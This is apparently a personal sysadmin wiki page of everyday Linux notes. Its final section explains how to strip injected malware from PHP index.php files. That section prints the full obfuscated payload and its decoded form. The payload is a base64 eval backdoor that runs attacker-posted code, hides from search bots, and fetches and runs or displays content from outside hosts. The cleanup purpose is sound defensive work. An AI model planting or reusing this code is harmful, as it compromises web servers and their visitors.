System/DayToDay
Revision as of 12:10, 24 June 2012 by Eadam (talk | contribs) (→Remove badware in *index.php files)
Contents
Remove by inode
find . -inum 782263 -exec rm -i {} \;
VIM
set viminfo='1000,f1,<500
.bashrc
export HISTFILESIZE=3000 alias l='ls -aCFlh' alias u="apt-get update" alias ug="apt-get upgrade" alias i="apt-get install" alias r="apt-get remove" alias s="apt-cache search"
kernel parameters
For Compact Flash:
libata.dma=0 ide=nodma ide-core.nodma=0.0 ide-core.nodma=0.1
sudo
... Defaults timestamp_timeout=20 ...
Remove badware in *index.php files
The following command:
find . -name '*index.php' -exec sed -i "s|<?php\ /\*68066\*/\ error_reporting(0);\ @ini_set('error_log',NULL);\ @ini_set('log_errors',0);\ @ini_set('display_errors','Off');\ @eval(\ base64_decode('.*'));/\*68066\*/\ ?>||" {} \;
Remove the following badware:
<?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaWYgKGlzc2V0KCRfUE9TVFsnY29va2llc19pJ10pKSB7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnY29va2llc19pJ10pKTt9CiR6Mzc9InN0YXRzIjsKJHVhMz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiR1MzcgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJNYWMiKTsKaWYoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICR1MzcpIC4gIi9pIiwgJHVhMykpIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pID09MCkgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX0NPT0tJRSJdKSkpCnt9CmVsc2UKewpAc2V0Y29va2llKCR6MzcsbWQ1KCJzdGF0cyIpLHRpbWUoKSsxNzI4MDApOwokaWQ9IjlvOGFhODhsOGVqaTEycmpmNWtva2VteGZ5amx6MXQiOwokdXJsPSJodHRwOi8vaWZyYW1lc2hvcC5uZXQvc3RpLnBocD9pZD0iLiRpZDsKJGlmcmFtZT1AZmlsZV9nZXRfY29udGVudHMgKCR1cmwpOwppZiAoJGlmcmFtZSkgZWNobygkaWZyYW1lKTsgCn0K'));/*68066*/ ?>
php code:
With different variants:
- ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKJHozNz0ic3RhdHMiOwokdWEzPSRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsKJHUzNyA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIiwgIk1hYyIsICJpbnV4IiwgIlgxMSIpOwppZigocHJlZ19tYXRjaCgiLyIgLiBpbXBsb2RlKCJ8IiwgJHUzNykgLiAiL2kiLCAkdWEzKSkgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXSkgPT0wKSAgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX0NPT0tJRSJdKSkgIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pID09MCkgKQp7fQplbHNlCnsKQHNldGNvb2tpZSgkejM3LG1kNSgic3RhdHMiKSx0aW1lKCkrMTcyODAwKTsKJHVybCA9ICJodHRwOi8vNDA0MGVudC5jb20vc2Vzc2lvbi5waHA/aWQiOwokaWZyYW1lPUBldmFsKGZpbGVfZ2V0X2NvbnRlbnRzICgkdXJsKSk7CmlmICgkaWZyYW1lKSBlY2hvKCRpZnJhbWUpOyAKfQoK
php code:
error_reporting(0);
set_time_limit(0);
$z37="stats";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Mac", "inux", "X11");
if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_SERVER["HTTP_REFERER"]) ==0) or (isset($_SERVER["HTTP_COOKIE"])) or (isset($_SERVER["HTTP_USER_AGENT"]) ==0) )
{}
else
{
@setcookie($z37,md5("stats"),time()+172800);
$url = "http://4040ent.com/session.php?id";
$iframe=@eval(file_get_contents ($url));
if ($iframe) echo($iframe);
}
- ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKJHozNz0ic3RhdHMiOwokdWEzPSRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsKJHUzNyA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIiwgIk1hYyIsICJpbnV4Iik7CmlmKChwcmVnX21hdGNoKCIvIiAuIGltcGxvZGUoInwiLCAkdTM3KSAuICIvaSIsICR1YTMpKSBvciAoaXNzZXQoJF9TRVJWRVJbIkhUVFBfQ09PS0lFIl0pKSAgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkgPT0wKSApCnt9CmVsc2UKewpAc2V0Y29va2llKCR6MzcsbWQ1KCJzdGF0cyIpLHRpbWUoKSsxNzI4MDApOwokdXJsID0gImh0dHA6Ly80MDQwZW50LmNvbS9zZXNzaW9uLnBocD9pZCI7CiRpZnJhbWU9QGV2YWwoZmlsZV9nZXRfY29udGVudHMgKCR1cmwpKTsKaWYgKCRpZnJhbWUpIGVjaG8oJGlmcmFtZSk7IAp9
php code:
